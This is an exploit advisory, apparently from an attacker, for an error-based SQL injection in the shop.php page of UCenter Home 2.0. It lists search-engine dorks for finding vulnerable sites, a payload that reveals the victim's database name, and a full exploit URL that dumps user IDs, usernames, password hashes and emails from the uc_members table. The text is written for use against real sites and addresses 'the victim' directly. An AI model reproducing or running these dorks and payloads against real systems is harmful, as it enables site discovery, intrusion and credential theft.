__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__

*/ Author : KnocKout
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
*/ Contact: knockoutr@msn.com
*/ Cyber-Warrior.org/CWKnocKout

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Script : UCenter Home
Version : 2.0
Script HomePage : http://u.discuz.net/

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Dork : Powered by UCenter inurl:shop.php?ac=view
Dork 2 : inurl:shop.php?ac=view&shopid=

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Vuln file : Shop.php
Values : (?)ac=view&shopid=
Vulnerable Style : SQL Injection (MySQL Error Based)
Need Materials : Hex Conversion

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

You need the victim's database name.

For Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

DB : Okey.
Edit the DB name: `[TARGET DB NAME]`
Example : 'hiwir1_ucenter'
Edit : Okey.

Use hex conversion and edit your SQL injection exploit.

Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1